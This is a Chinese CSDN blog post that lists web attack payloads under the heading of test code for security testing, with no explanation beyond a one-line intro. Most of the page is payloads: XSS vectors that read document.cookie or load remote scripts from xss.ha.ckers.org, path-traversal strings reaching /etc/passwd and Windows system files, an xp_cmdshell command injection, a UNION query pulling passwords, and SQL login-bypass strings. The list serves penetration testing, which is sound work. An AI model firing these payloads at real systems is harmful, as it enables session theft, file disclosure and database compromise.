XSS测试代码大全

最新推荐文章于 2024-06-11 14:40:18 发布
最新推荐文章于 2024-06-11 14:40:18 发布
阅读量1.5w 收藏 6
点赞数
分类专栏: 测试经验总结
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18808965/article/details/78530497
版权 
XSS测试代码大全 


主要根据各种脚本及标签,将之转换成Unicode编码后输入。


'><script>alert(document.cookie)</script> 
='><script>alert(document.cookie)</script> 
<script>alert(document.cookie)</script> 
<script>alert(vulnerable)</script> 
%3Cscript%3Ealert('XSS')%3C/script%3E 
<script>alert('XSS')</script> 
<img src="javascript:alert('XSS')"> 
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp 
%22%3cscript%3ealert(%22xss%22)%3c/script%3e 
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini 
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e 
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e 
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html 
%3f.jsp 
%3f.jsp 
<script>alert('Vulnerable');</script> 
<script>alert('Vulnerable')</script> 
?sql_debug=1 
a%5c.aspx 
a.jsp/<script>alert('Vulnerable')</script> 
a/ 
a?<script>alert('Vulnerable')</script> 
"><script>alert('Vulnerable')</script> 
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&& 
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
%3Cscript%3Ealert(document. domain);%3C/script%3E& 
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= 
../../../../../../../../etc/passwd 
..\..\..\..\..\..\..\..\windows\system.ini 
\..\..\..\..\..\..\..\..\windows\system.ini 
'';!--"<XSS>=&{()} 
<IMG src="javascript:alert('XSS');"> 
<IMG src=javascript:alert('XSS')> 
<IMG src=JaVaScRiPt:alert('XSS')> 
<IMG src=JaVaScRiPt:alert("XSS")> 
<IMG src=javascript:alert('XSS')> 
<IMG src=javascript:alert('XSS')> 
<IMG src=javascript:alert('XSS')> 
<IMG src="jav ascript:alert('XSS');"> 
<IMG src="jav ascript:alert('XSS');"> 
<IMG src="jav ascript:alert('XSS');"> 
"<IMG src=java\0script:alert(\"XSS\")>";' > 
<IMG src=" javascript:alert('XSS');"> 
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT> 
<BODY BACKGROUND="javascript:alert('XSS')"> 
<BODY ONLOAD=alert('XSS')> 
<IMG DYNSRC="javascript:alert('XSS')"> 
<IMG LOWSRC="javascript:alert('XSS')"> 
<BGSOUND src="javascript:alert('XSS');"> 
<br size="&{alert('XSS')}"> 
<LAYER src="http://xss.ha.ckers.org/a.js"></layer> 
<LINK REL="stylesheet" href="javascript:alert('XSS');"> 
<IMG src='vbscript:msgbox("XSS")'> 
<IMG src="mocha:[code]"> 
<IMG src="livescript:[code]"> 
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> 
<IFRAME src=javascript:alert('XSS')></IFRAME> 
<FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET> 
<TABLE BACKGROUND="javascript:alert('XSS')"> 
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> 
<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');"> 
<DIV STYLE="width: expression(alert('XSS'));"> 
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> 
<IMG STYLE='xss:expre\ssion(alert("XSS"))'> 
<STYLE TYPE="text/javascript">alert('XSS');</STYLE> 
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> 
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> 
<BASE href="javascript:alert('XSS');//"> 
getURL("javascript:alert('XSS')") 
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d); 
<XML src="javascript:alert('XSS');"> 
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><" 
<SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT> 
<IMG src="javascript:alert('XSS')" 
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"--> 
<IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> 
<SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT> 
<SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT> 
<SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT> 
<SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT> 
<SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT> 
<A href=http://www.gohttp://www.google.com/ogle.com/>link</A> 
admin'-- 
' or 0=0 -- 
" or 0=0 -- 
or 0=0 -- 
' or 0=0 # 
" or 0=0 # 
or 0=0 # 
' or 'x'='x 
" or "x"="x 
') or ('x'='x 
' or 1=1-- 
" or 1=1-- 
or 1=1-- 
' or a=a-- 
" or "a"="a 
') or ('a'='a 
") or ("a"="a 
hi" or "a"="a 
hi" or 1=1 -- 
hi' or 1=1 -- 
hi' or 'a'='a 
hi') or ('a'='a 
hi") or ("a"="a[/code]

〆WangBenYan゜
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS测试
qq_52016943的博客
07-28 1228
XSS 绕过
XSS测试平台使用
Fly_鹏程万里
08-07 2056
这里推荐一个常用的XSS平台:xsspt.com,下面是该平台的使用教程~ XSSPT使用方法: 注册 如果没有账户,可以通过“注册”来注册一个账户: 登录 使用注册的账户登录进行登录认证,之后即可进入主页面 功能界面介绍 a、主界面 B、辅助选项 C、学习 该模块披露了一些已经修复的漏洞,有助于自我学习与实践 D、友情链接与历史 友情链接可以帮助你...
xss测试代码大全javascript中的xss过滤
03-24
xss测试代码大全
XSS测试代码
Tianyi_liang的博客
03-13 1159
XSS测试代码收集
XSS攻击绕过方法大全,XSS攻击技巧,收集100种绕过方法分享(2024最新)_xss绕过
最新发布
weixin_42340783的博客
06-11 1343
尽管许多网站实施了输入过滤措施来防止跨站脚本(XSS)攻击,但在特定条件下,经过精心编码的脚本仍有可能实施XSS注入。本文旨在为专业的安全测试人员提供一个跨站脚本漏洞的检测指南。
XSS 跨站测试代码大全2
LIVE
11-07 1287
0x01 XSS介绍 1. XSS分类 (1) 反射型XSS、 (2)存储型XSS、 (3)Dom型XSS、 (4) 通用型XSS、(全称Universal Cross-Site Scripting,翻译过来就是通用型XSS 简称UXSS) (5) 突变型XSS ( 介绍: mXS()突变 XSS) 是当不可信数据在 DOM 的 innerHTML 属性的上下文被处理并通过浏览器发生突变,...
XSS跨站测试代码大全
xysoul的专栏
04-13 6295
'>alert(document.cookie)   ='>alert(document.cookie)   alert(document.cookie)   alert(vulnerable)   %3Cscript%3Ealert('XSS')%3C/script%3E   alert('XSS')      %0a%0aalert(\"Vulnerable\").jsp
安全测试xss攻击通用测试用例
测试开发
04-12 735
安全测试,测xss攻击,一个通用case测出一类问题。测试开发同学可以关注一下
XSS测试代码大全————
11-03
XSS测试代码 安全测试 XSS测试代码大全
基于爬虫开发XSS检测程序-代码.rar
04-10
压缩包中的"**wgdscan**"可能是这个XSS检测程序的源代码文件名。通过阅读和分析这些代码,我们可以深入了解作者如何实现上述知识点,学习如何构建一个有效的XSS检测系统。这不仅有助于提高我们的安全防护能力,也为...
XSS测试语句大全
08-07
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html...
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
Web安全:XSS漏洞的测试(防止 黑客利用此漏洞.)
热门推荐
网络安全领域___专研者.
03-17 1万+
XSS漏洞的概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
XSS 攻击常用代码
高压锅博客
12-22 7220
【代码】XSS 攻击常用代码。
xss代码集
Sylon的博客
10-09 3765
</script>"><script>prompt(1)</script> </ScRiPt>"><ScRiPt>prompt(1)</ScRiPt> "><img src=x onerror=prompt(1)> "><svg/onload=prompt(1)> ">&l...
常用xss代码以及绕过
csviking的博客
11-18 7725
常规xss的代码 "OnMoUsEoVeR=prompt(1)// #一般用于表单框插入比较好 "-prompt(1)-" # URL删除参数,列如id=1 xss添加为id="-prompt(1)-"
转:xss注入方法及验证方法
qq284489030的博客
09-06 9180
注:本文描述的是一般情况的xss注入方法及验证方法,并无覆盖所有xss情况,   步骤1:在任一输入框中输入以下注入字符 &gt;"'&gt;&lt;script&gt;alert(XSS)&lt;/script&gt; &gt;"'&gt;&lt;img src="javascript:alert(123456)"&gt; 1234&lt;%00script&g
代码审计——XSS详解
Boom!脑洞大爆炸的博客
06-17 2101
代码审计之XSS详解
xss payload
07-15 380
'><script>alert(document.cookie)</script>='><script>alert(document.cookie)</script><script>alert(document.cookie)</script><script>alert(vulnerab...
生成安全测试xss注入代码测试vue页面
06-07
您可以使用一些自动化测试工具来生成安全测试XSS注入代码测试Vue页面。其中一个常用的工具是OWASP ZAP,它可以自动生成XSS注入代码并测试Vue页面的安全性。另外,您也可以手动编写XSS注入代码并在Vue页面中进行测试。这需要您有一定的安全测试经验和编程知识。无论使用哪种方法,都应该在开发和发布前进行安全测试以确保您的Vue应用程序的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值